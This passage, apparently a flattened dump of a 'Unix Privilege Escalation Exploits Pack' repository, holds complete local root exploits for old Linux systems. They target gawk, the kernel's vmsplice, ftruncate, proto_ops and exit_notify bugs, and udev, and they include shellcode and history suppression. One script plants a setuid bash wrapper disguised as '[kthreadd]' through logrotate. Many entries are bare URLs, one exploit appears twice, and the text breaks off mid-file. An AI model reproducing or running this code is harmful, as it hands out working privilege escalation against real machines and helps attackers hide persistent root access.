*(pointer++) = NOP; 57 | 58 | for(c = 0; c < strlen(shellcode); c++) 59 | *(pointer++) = shellcode[c]; 60 | 61 | egg[EGGSIZE -1] = '\0'; 62 | buffer[bsize -1] = '\0'; 63 | 64 | memcpy(buffer, "RET=", 4); putenv(buffer); 65 | memcpy(egg, "EGG=", 4); putenv(egg); 66 | 67 | system("/usr/bin/compress $RET"); 68 | 69 | return 0; 70 | } 71 | -------------------------------------------------------------------------------- /2007/gawk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2007/gawk -------------------------------------------------------------------------------- /2007/gawk_expl.c: -------------------------------------------------------------------------------- 1 | 2 | /* local GNU Awk 3.1.0-x proof of concept exploit */ 3 | 4 | #include 5 | #include 6 | 7 | void aborted(int); 8 | 9 | char shellcode[] = 10 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 11 | "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 12 | "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 13 | 14 | int 15 | main() 16 | { 17 | unsigned long ret = 0xbffffd30; 18 | char buf[8214]; 19 | char egg[1024]; 20 | char *ptr; 21 | 22 | int i=0; 23 | 24 | memset(buf,0x90,sizeof(buf)); 25 | ptr = egg; 26 | 27 | for (i = 0; i < 1024 - strlen(shellcode) -1; i++) *(ptr++) = '\x90'; 28 | for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; 29 | 30 | egg[1024 - 1] = '\0'; 31 | memcpy(egg,"EGG=",4); 32 | putenv(egg); 33 | 34 | buf[8209] = (ret & 0x000000ff); 35 | buf[8210] = (ret & 0x0000ff00) >> 8; 36 | buf[8211] = (ret & 0x00ff0000) >> 16; 37 | buf[8212] = (ret & 0xff000000) >> 24; 38 | buf[8213] = 0x00; 39 | 40 | printf("local GNU Awk 3.1.0-x proof of concept exploit\n"); 41 | printf("ret: 0x%x\n",ret); 42 | printf("buf: %d\n\n",strlen(buf)); 43 | 44 | execl("/usr/bin/gawk", "gawk", "-f" , buf, NULL); 45 | } 46 | -------------------------------------------------------------------------------- /2007/w00t.so.1.0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2007/w00t.so.1.0 -------------------------------------------------------------------------------- /2008/1-2008: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/1-2008 -------------------------------------------------------------------------------- /2008/16: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/16 -------------------------------------------------------------------------------- /2008/2.4.36.92.6.27.5 - 2008 Local root: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2.4.36.92.6.27.5 - 2008 Local root -------------------------------------------------------------------------------- /2008/2.6.17-18-19-20-24: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2.6.17-18-19-20-24 -------------------------------------------------------------------------------- /2008/2.6.18-164: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2.6.18-164 -------------------------------------------------------------------------------- /2008/2.6.22: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2.6.22 -------------------------------------------------------------------------------- /2008/2.6.23: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2008/2.6.23-2.6.24.c: -------------------------------------------------------------------------------- 1 | /* 2 | * diane_lane_fucked_hard.c 3 | * 4 | * Linux vmsplice Local Root Exploit 5 | * By qaaz 6 | * 7 | * Linux 2.6.23 - 2.6.24 8 | */ 9 | #define _GNU_SOURCE 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #define TARGET_PATTERN " sys_vm86old" 18 | #define TARGET_SYSCALL 113 19 | 20 | #ifndef __NR_vmsplice 21 | #define __NR_vmsplice 316 22 | #endif 23 | 24 | #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) 25 | #define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4) 26 | 27 | #define TRAMP_CODE (void *) trampoline 28 | #define TRAMP_SIZE ( sizeof(trampoline) - 1 ) 29 | 30 | unsigned char trampoline[] = 31 | "\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */ 32 | "\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */ 33 | "\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */ 34 | "\x75\x02" /* jne +2 */ 35 | "\xff\xd1" /* call *%ecx */ 36 | "\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */ 37 | "\xc3" /* ret */ 38 | ; 39 | 40 | void die(char *msg, int err) 41 | { 42 | printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); 43 | fflush(stdout); 44 | fflush(stderr); 45 | exit(1); 46 | } 47 | 48 | long get_target() 49 | { 50 | FILE *f; 51 | long addr = 0; 52 | char line[128]; 53 | 54 | f = fopen("/proc/kallsyms", "r"); 55 | if (!f) die("/proc/kallsyms", errno); 56 | 57 | while (fgets(line, sizeof(line), f)) { 58 | if (strstr(line, TARGET_PATTERN)) { 59 | addr = strtoul(line, NULL, 16); 60 | break; 61 | } 62 | } 63 | 64 | fclose(f); 65 | return addr; 66 | } 67 | 68 | static inline __attribute__((always_inline)) 69 | void * get_current() 70 | { 71 | unsigned long curr; 72 | __asm__ __volatile__ ( 73 | "movl %%esp, %%eax ;" 74 | "andl %1, %%eax ;" 75 | "movl (%%eax), %0" 76 | : "=r" (curr) 77 | : "i" (~8191) 78 | ); 79 | return (void *) curr; 80 | } 81 | 82 | static uint uid, gid; 83 | 84 | void kernel_code() 85 | { 86 | int i; 87 | uint *p = get_current(); 88 | 89 | for (i = 0; i < 1024-13; i++) { 90 | if (p[0] == uid && p[1] == uid && 91 | p[2] == uid && p[3] == uid && 92 | p[4] == gid && p[5] == gid && 93 | p[6] == gid && p[7] == gid) { 94 | p[0] = p[1] = p[2] = p[3] = 0; 95 | p[4] = p[5] = p[6] = p[7] = 0; 96 | p = (uint *) ((char *)(p + 8) + sizeof(void *)); 97 | p[0] = p[1] = p[2] = ~0; 98 | break; 99 | } 100 | p++; 101 | } 102 | } 103 | 104 | int main(int argc, char *argv[]) 105 | { 106 | int pi[2]; 107 | long addr; 108 | struct iovec iov; 109 | 110 | uid = getuid(); 111 | gid = getgid(); 112 | setresuid(uid, uid, uid); 113 | setresgid(gid, gid, gid); 114 | 115 | printf("-----------------------------------\n"); 116 | printf(" Linux vmsplice Local Root Exploit\n"); 117 | printf(" By qaaz\n"); 118 | printf("Modified By : HACKERS PAL \n"); 119 | printf("For WwW.SoQoR.NeT Members 2008 ..\n"); 120 | printf("-----------------------------------\n"); 121 | 122 | if (!uid || !gid) 123 | die("!@#$", 0); 124 | 125 | addr = get_target(); 126 | printf("[+] addr: 0x%lx\n", addr); 127 | 128 | if (pipe(pi) < 0) 129 | die("pipe", errno); 130 | 131 | iov.iov_base = (void *) addr; 132 | iov.iov_len = TRAMP_SIZE; 133 | 134 | write(pi[1], TRAMP_CODE, TRAMP_SIZE); 135 | _vmsplice(pi[0], &iov, 1, 0); 136 | 137 | gimmeroot(); 138 | 139 | if (getuid() != 0) 140 | die("wtf", 0); 141 | 142 | printf("[+] root\n"); 143 | putenv("HISTFILE=/dev/null"); 144 | execl("/bin/bash", "bash", "-i", NULL); 145 | die("/bin/bash", errno); 146 | return 0; 147 | } 148 | 149 | // milw0rm.com [2008-02-09] -------------------------------------------------------------------------------- /2008/2.6.23=2008: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2.6.23=2008 -------------------------------------------------------------------------------- /2008/2.6.9-67-2008: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2.6.9-67-2008 -------------------------------------------------------------------------------- /2008/2008: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2008 -------------------------------------------------------------------------------- /2008/2008-4210: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2008/2008-4210 -------------------------------------------------------------------------------- /2008/2008-4210.c: -------------------------------------------------------------------------------- 1 | /* 2 | gw-ftrex.c: 3 | 4 | Linux kernel < 2.6.22 open/ftruncate local exploit 5 | by 6 | 7 | bug information: 8 | http://osvdb.org/49081 9 | 10 | 11 | !!!This is for educational purposes only!!! 12 | 13 | To use it, you've got to find a sgid directory you've got 14 | permissions to write into (obviously world-writable), e.g: 15 | find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx" 16 | which fortunately is not common those days :) 17 | And also a shell that does not drop sgid privs upon execution (like ash/sash). 18 | E.g: 19 | 20 | test:/fileserver/samba$ ls -ld 21 | drwxrwsrwx 2 root root 4096 2008-10-27 16:27. 22 | test:/fileserver/samba$ id 23 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 24 | test:/fileserver/samba$ /tmp/gw-ftrex 25 | ash shell found! 26 | size=80200 27 | We're evil evil evil! 28 | 29 | $ id 30 | uid=33(www-data) gid=33(www-data) egid=0(root) groups=33(www-data) 31 | 32 | Trqbva da kaja neshto umno kato zakliuchenie...ma sega ne moga da se setia. 33 | */ 34 | 35 | 36 | 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | int main(int argc, char *argv[]) 43 | { 44 | char *buf=malloc(3096*1024); //3mb just to be sure 45 | int a,len; 46 | int fd,fd1; 47 | char *buf1; 48 | int shell=0; 49 | 50 | 51 | if (stat("/bin/ash",buf)==0) 52 | { 53 | printf("ash shell found!\n"); 54 | shell=1; 55 | } 56 | 57 | if (shell==0) if (stat("/bin/sash",buf)==0) 58 | { 59 | printf("sash shell found!\n"); 60 | shell=1; 61 | } 62 | 63 | if (shell==0) 64 | { 65 | printf("no suitable shell found (one that does not drop sgid permissions) :(\n"); 66 | exit(2); 67 | } 68 | 69 | 70 | len=0; 71 | if (shell==1) fd=open("/bin/ash",O_RDONLY); 72 | if (shell==2) fd=open("/bin/sash",O_RDONLY); 73 | 74 | while (read(fd,buf+len,1)) len++; 75 | 76 | printf("size=%d\n",len); 77 | fd1=open(".evilsploit",O_RDWR | O_CREAT | O_EXCL, 02750); 78 | ftruncate(fd1, len); 79 | buf1 = mmap(NULL, len, PROT_WRITE | PROT_EXEC, MAP_SHARED, fd1, 0); 80 | memcpy(buf1,buf,len); 81 | munmap(buf1,len); 82 | close(fd1);close(fd); 83 | free(buf); 84 | printf("We're evil evil evil!\n\n"); 85 | execv(".evilsploit", NULL); 86 | } 87 | 88 | // milw0rm.com [2008-10-27] 89 | -------------------------------------------------------------------------------- /2009/2.4.AnD.2.6-2009: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/2.4.AnD.2.6-2009 -------------------------------------------------------------------------------- /2009/2.6.18-128: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/2.6.18-128 -------------------------------------------------------------------------------- /2009/2.6.23-2009.c: -------------------------------------------------------------------------------- 1 | /* 2 | * diane_lane_fucked_hard.c 3 | * 4 | * Linux vmsplice Local Root Exploit 5 | * By qaaz 6 | * 7 | * Linux 2.6.23 - 2.6.24 8 | */ 9 | #define _GNU_SOURCE 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #define TARGET_PATTERN " sys_vm86old" 18 | #define TARGET_SYSCALL 113 19 | 20 | #ifndef __NR_vmsplice 21 | #define __NR_vmsplice 316 22 | #endif 23 | 24 | #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) 25 | #define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4) 26 | 27 | #define TRAMP_CODE (void *) trampoline 28 | #define TRAMP_SIZE ( sizeof(trampoline) - 1 ) 29 | 30 | unsigned char trampoline[] = 31 | "\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */ 32 | "\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */ 33 | "\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */ 34 | "\x75\x02" /* jne +2 */ 35 | "\xff\xd1" /* call *%ecx */ 36 | "\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */ 37 | "\xc3" /* ret */ 38 | ; 39 | 40 | void die(char *msg, int err) 41 | { 42 | printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); 43 | fflush(stdout); 44 | fflush(stderr); 45 | exit(1); 46 | } 47 | 48 | long get_target() 49 | { 50 | FILE *f; 51 | long addr = 0; 52 | char line[128]; 53 | 54 | f = fopen("/proc/kallsyms", "r"); 55 | if (!f) die("/proc/kallsyms", errno); 56 | 57 | while (fgets(line, sizeof(line), f)) { 58 | if (strstr(line, TARGET_PATTERN)) { 59 | addr = strtoul(line, NULL, 16); 60 | break; 61 | } 62 | } 63 | 64 | fclose(f); 65 | return addr; 66 | } 67 | 68 | static inline __attribute__((always_inline)) 69 | void * get_current() 70 | { 71 | unsigned long curr; 72 | __asm__ __volatile__ ( 73 | "movl %%esp, %%eax ;" 74 | "andl %1, %%eax ;" 75 | "movl (%%eax), %0" 76 | : "=r" (curr) 77 | : "i" (~8191) 78 | ); 79 | return (void *) curr; 80 | } 81 | 82 | static uint uid, gid; 83 | 84 | void kernel_code() 85 | { 86 | int i; 87 | uint *p = get_current(); 88 | 89 | for (i = 0; i < 1024-13; i++) { 90 | if (p[0] == uid && p[1] == uid && 91 | p[2] == uid && p[3] == uid && 92 | p[4] == gid && p[5] == gid && 93 | p[6] == gid && p[7] == gid) { 94 | p[0] = p[1] = p[2] = p[3] = 0; 95 | p[4] = p[5] = p[6] = p[7] = 0; 96 | p = (uint *) ((char *)(p + 8) + sizeof(void *)); 97 | p[0] = p[1] = p[2] = ~0; 98 | break; 99 | } 100 | p++; 101 | } 102 | } 103 | 104 | int main(int argc, char *argv[]) 105 | { 106 | int pi[2]; 107 | long addr; 108 | struct iovec iov; 109 | 110 | uid = getuid(); 111 | gid = getgid(); 112 | setresuid(uid, uid, uid); 113 | setresgid(gid, gid, gid); 114 | 115 | printf("-----------------------------------\n"); 116 | printf(" Linux vmsplice Local Root Exploit\n"); 117 | printf(" By qaaz\n"); 118 | printf("-----------------------------------\n"); 119 | 120 | if (!uid || !gid) 121 | die("!@#$", 0); 122 | 123 | addr = get_target(); 124 | printf("[+] addr: 0x%lx\n", addr); 125 | 126 | if (pipe(pi) < 0) 127 | die("pipe", errno); 128 | 129 | iov.iov_base = (void *) addr; 130 | iov.iov_len = TRAMP_SIZE; 131 | 132 | write(pi[1], TRAMP_CODE, TRAMP_SIZE); 133 | _vmsplice(pi[0], &iov, 1, 0); 134 | 135 | gimmeroot(); 136 | 137 | if (getuid() != 0) 138 | die("wtf", 0); 139 | 140 | printf("[+] root\n"); 141 | putenv("HISTFILE=/dev/null"); 142 | execl("/bin/bash", "bash", "-i", NULL); 143 | die("/bin/bash", errno); 144 | return 0; 145 | } -------------------------------------------------------------------------------- /2009/2.6.29.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ################################################################################### 4 | # gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit 5 | # 6 | # by Milen Rangelov (gat3way-at-gat3way-dot-eu) 7 | # 8 | # Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov. 9 | # Basically it allows us to send arbitrary signals to a privileged (suidroot) 10 | # parent process. Due to a bad check, the child process with appropriate exit signal 11 | # already set can first execute a suidroot binary then exit() and thus bypass 12 | # in-kernel privilege checks. We use chfn and gpasswd for that purpose. 13 | # 14 | # !!!!!!!!!!! 15 | # Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0 16 | # so you'll be out of luck most of the time. 17 | # So it is not going to be the script kiddies' new killer shit :-) 18 | # !!!!!!!!!!! 19 | # 20 | # if you invent a better way to escalate privileges by sending arbitrary signals to 21 | # the parent process, please mail me :) That was the best I could think of today :-( 22 | # 23 | # This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness 24 | # 25 | # Skuchna rabota... 26 | # 27 | #################################################################################### 28 | 29 | -------------------------------------------------------------------------------- /2009/2009-proto_ops/exploit.c: -------------------------------------------------------------------------------- 1 | /* 2 | * 14.08.2009, babcia padlina 3 | * 4 | * vulnerability discovered by google security team 5 | * 6 | * some parts of exploit code borrowed from vmsplice exploit by qaaz 7 | * per_svr4 mmap zero technique developed by Julien Tinnes and Tavis Ormandy: 8 | * http://xorl.wordpress.com/2009/07/16/cve-2009-1895-linux-kernel-per_clear_on_setid-personality-bypass/ 9 | */ 10 | 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | static unsigned int uid, gid; 25 | 26 | #define USER_CS 0x73 27 | #define USER_SS 0x7b 28 | #define USER_FL 0x246 29 | #define STACK(x) (x + sizeof(x) - 40) 30 | 31 | void exit_code(); 32 | char exit_stack[1024 * 1024]; 33 | 34 | static inline __attribute__((always_inline)) void *get_current() 35 | { 36 | unsigned long curr; 37 | __asm__ __volatile__ ( 38 | "movl %%esp, %%eax ;" 39 | "andl %1, %%eax ;" 40 | "movl (%%eax), %0" 41 | : "=r" (curr) 42 | : "i" (~8191) 43 | ); 44 | return (void *) curr; 45 | } 46 | 47 | static inline __attribute__((always_inline)) void exit_kernel() 48 | { 49 | __asm__ __volatile__ ( 50 | "movl %0, 0x10(%%esp) ;" 51 | "movl %1, 0x0c(%%esp) ;" 52 | "movl %2, 0x08(%%esp) ;" 53 | "movl %3, 0x04(%%esp) ;" 54 | "movl %4, 0x00(%%esp) ;" 55 | "iret" 56 | : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), 57 | "i" (USER_CS), "r" (exit_code) 58 | ); 59 | } 60 | 61 | void kernel_code() 62 | { 63 | int i; 64 | uint *p = get_current(); 65 | 66 | for (i = 0; i < 1024-13; i++) { 67 | if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { 68 | p[0] = p[1] = p[2] = p[3] = 0; 69 | p[4] = p[5] = p[6] = p[7] = 0; 70 | p = (uint *) ((char *)(p + 8) + sizeof(void *)); 71 | p[0] = p[1] = p[2] = ~0; 72 | break; 73 | } 74 | p++; 75 | } 76 | 77 | exit_kernel(); 78 | } 79 | 80 | void exit_code() 81 | { 82 | if (getuid() != 0) { 83 | fprintf(stderr, "failed\n"); 84 | exit(-1); 85 | } 86 | 87 | execl("/bin/sh", "sh", "-i", NULL); 88 | } 89 | 90 | int main(void) { 91 | char template[] = "/tmp/padlina.XXXXXX"; 92 | int fdin, fdout; 93 | void *page; 94 | 95 | uid = getuid(); 96 | gid = getgid(); 97 | setresuid(uid, uid, uid); 98 | setresgid(gid, gid, gid); 99 | 100 | if ((personality(0xffffffff)) != PER_SVR4) { 101 | if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) { 102 | perror("mmap"); 103 | return -1; 104 | } 105 | } else { 106 | if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) { 107 | perror("mprotect"); 108 | return -1; 109 | } 110 | } 111 | 112 | *(char *)0 = '\x90'; 113 | *(char *)1 = '\xe9'; 114 | *(unsigned long *)2 = (unsigned long)&kernel_code - 6; 115 | 116 | if ((fdin = mkstemp(template)) < 0) { 117 | perror("mkstemp"); 118 | return -1; 119 | } 120 | 121 | if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) { 122 | perror("socket"); 123 | return -1; 124 | } 125 | 126 | unlink(template); 127 | ftruncate(fdin, PAGE_SIZE); 128 | sendfile(fdout, fdin, NULL, PAGE_SIZE); 129 | } 130 | 131 | -------------------------------------------------------------------------------- /2009/2009-proto_ops/run.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(void) { 6 | if (personality(PER_SVR4) < 0) { 7 | perror("personality"); 8 | return -1; 9 | } 10 | 11 | fprintf(stderr, "padlina z lublina!\n"); 12 | 13 | execl("./exploit", "exploit", 0); 14 | } 15 | 16 | 17 | -------------------------------------------------------------------------------- /2009/2009-proto_ops/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | gcc -o run run.c && \ 4 | gcc -o exploit exploit.c && \ 5 | ./run 6 | -------------------------------------------------------------------------------- /2009/2009.6.18-164: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/2009.6.18-164 -------------------------------------------------------------------------------- /2009/2009.6.31_2009: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/2009.6.31_2009 -------------------------------------------------------------------------------- /2009/CVE-2009-0360/CVE-2009-0360: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2009/CVE-2009-0360/CVE-2009-0360 -------------------------------------------------------------------------------- /2009/CVE-2009-1185.c: -------------------------------------------------------------------------------- 1 | /* 2 | * cve-2009-1185.c 3 | * 4 | * udev < 141 Local Privilege Escalation Exploit 5 | * Jon Oberheide 6 | * http://jon.oberheide.org 7 | * 8 | * Information: 9 | * 10 | * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185 11 | * 12 | * udev before 1.4.1 does not verify whether a NETLINK message originates 13 | * from kernel space, which allows local users to gain privileges by sending 14 | * a NETLINK message from user space. 15 | * 16 | * Notes: 17 | * 18 | * An alternate version of kcope's exploit. This exploit leverages the 19 | * 95-udev-late.rules functionality that is meant to run arbitrary commands 20 | * when a device is removed. A bit cleaner and reliable as long as your 21 | * distro ships that rule file. 22 | * 23 | * Tested on Gentoo, Intrepid, and Jaunty. 24 | * 25 | * Usage: 26 | * 27 | * Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, 28 | * usually is the udevd PID minus 1) as argv[1]. 29 | * 30 | * The exploit will execute /tmp/run as root so throw whatever payload you 31 | * want in there. 32 | */ 33 | 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | 44 | #ifndef NETLINK_KOBJECT_UEVENT 45 | #define NETLINK_KOBJECT_UEVENT 15 46 | #endif 47 | 48 | int 49 | main(int argc, char **argv) 50 | { 51 | int sock; 52 | char *mp, *err; 53 | char message[4096]; 54 | struct stat st; 55 | struct msghdr msg; 56 | struct iovec iovector; 57 | struct sockaddr_nl address; 58 | 59 | if (argc < 2) { 60 | err = "Pass the udevd netlink PID as an argument"; 61 | printf("[-] Error: %s\n", err); 62 | exit(1); 63 | } 64 | 65 | if ((stat("/etc/udev/rules.d/95-udev-late.rules", &st) == -1) && 66 | (stat("/lib/udev/rules.d/95-udev-late.rules", &st) == -1)) { 67 | err = "Required 95-udev-late.rules not found"; 68 | printf("[-] Error: %s\n", err); 69 | exit(1); 70 | } 71 | 72 | if (stat("/tmp/run", &st) == -1) { 73 | err = "/tmp/run does not exist, please create it"; 74 | printf("[-] Error: %s\n", err); 75 | exit(1); 76 | } 77 | system("chmod +x /tmp/run"); 78 | 79 | memset(&address, 0, sizeof(address)); 80 | address.nl_family = AF_NETLINK; 81 | address.nl_pid = atoi(argv[1]); 82 | address.nl_groups = 0; 83 | 84 | msg.msg_name = (void*)&address; 85 | msg.msg_namelen = sizeof(address); 86 | msg.msg_iov = &iovector; 87 | msg.msg_iovlen = 1; 88 | 89 | sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); 90 | bind(sock, (struct sockaddr *) &address, sizeof(address)); 91 | 92 | mp = message; 93 | mp += sprintf(mp, "remove@/d") + 1; 94 | mp += sprintf(mp, "SUBSYSTEM=block") + 1; 95 | mp += sprintf(mp, "DEVPATH=/dev/foo") + 1; 96 | mp += sprintf(mp, "TIMEOUT=10") + 1; 97 | mp += sprintf(mp, "ACTION=remove") +1; 98 | mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1; 99 | 100 | iovector.iov_base = (void*)message; 101 | iovector.iov_len = (int)(mp-message); 102 | 103 | sendmsg(sock, &msg, 0); 104 | 105 | close(sock); 106 | 107 | return 0; 108 | } 109 | 110 | // milw0rm.com [2009-04-30] 111 | -------------------------------------------------------------------------------- /2009/CVE-2009-1337.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ################################################################################### 4 | # gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit 5 | # 6 | # by Milen Rangelov (gat3way-at-gat3way-dot-eu) 7 | # 8 | # Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov. 9 | # Basically it allows us to send arbitrary signals to a privileged (suidroot) 10 | # parent process. Due to a bad check, the child process with appropriate exit signal 11 | # already set can first execute a suidroot binary then exit() and thus bypass 12 | # in-kernel privilege checks. We use chfn and gpasswd for that purpose. 13 | # 14 | # !!!!!!!!!!! 15 | # Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0 16 | # so you'll be out of luck most of the time. 17 | # So it is not going to be the script kiddies' new killer shit :-) 18 | # !!!!!!!!!!! 19 | # 20 | # if you invent a better way to escalate privileges by sending arbitrary signals to 21 | # the parent process, please mail me :) That was the best I could think of today :-( 22 | # 23 | # This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness 24 | # 25 | # Skuchna rabota... 26 | # 27 | #################################################################################### 28 | 29 | 30 | 31 | 32 | SUIDDUMP=`cat /proc/sys/fs/suid_dumpable` 33 | if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi 34 | if [ -d /etc/logrotate.d ]; then 35 | echo "logrotate installed, that's good!" 36 | else 37 | echo "No logrotate installed, sorry!";exit 38 | fi 39 | 40 | echo -e "Compiling the bash setuid() wrapper..." 41 | cat >> /tmp/.m.c << EOF 42 | #include 43 | #include 44 | 45 | int main() 46 | { 47 | setuid(0); 48 | execl("/bin/bash","[kthreadd]",NULL); 49 | } 50 | EOF 51 | 52 | cc /tmp/.m.c -o /tmp/.m 53 | rm /tmp/.m.c 54 | 55 | echo -e "Compiling the exploit code..." 56 | 57 | cat >> /tmp/exploit.c << EOF 58 | #include 59 | #include 60 | #include 61 | #include 62 | #include 63 | 64 | int child(void *data) 65 | { 66 | sleep(2); 67 | printf("I'm gonna kill the suidroot father without having root rights :D\n"); 68 | execl("/usr/bin/gpasswd","%s",NULL); 69 | exit(0); 70 | } 71 | 72 | int main() 73 | { 74 | int stacksize = 4*getpagesize(); 75 | void *stack, *stacktop; 76 | stack = malloc(stacksize); 77 | stacktop = stack + stacksize; 78 | chdir("/etc/logrotate.d"); 79 | int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL); 80 | if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL); 81 | } 82 | EOF 83 | 84 | cc /tmp/exploit.c -o /tmp/.ex 85 | rm /tmp/exploit.c 86 | 87 | echo -e "Setting coredump limits and running the exploit...\n" 88 | ulimit -c 10000 89 | touch /tmp/.a 90 | `/tmp/.ex >/dev/null 2>/dev/null` 91 | sleep 5 92 | rm /tmp/.ex 93 | 94 | if [ -e /etc/logrotate.d/core ]; then 95 | echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n" 96 | echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root" 97 | echo -e "\nYour terminal is most probably screwed now, sorry for that..." 98 | exit 99 | fi 100 | 101 | echo "The system is not vulnerable, sorry :(" 102 | 103 | # milw0rm.com [2009-04-08] 104 | -------------------------------------------------------------------------------- /2009/CVE-2009-1527.c: -------------------------------------------------------------------------------- 1 | /* 2 | ptrace_attach privilege escalation 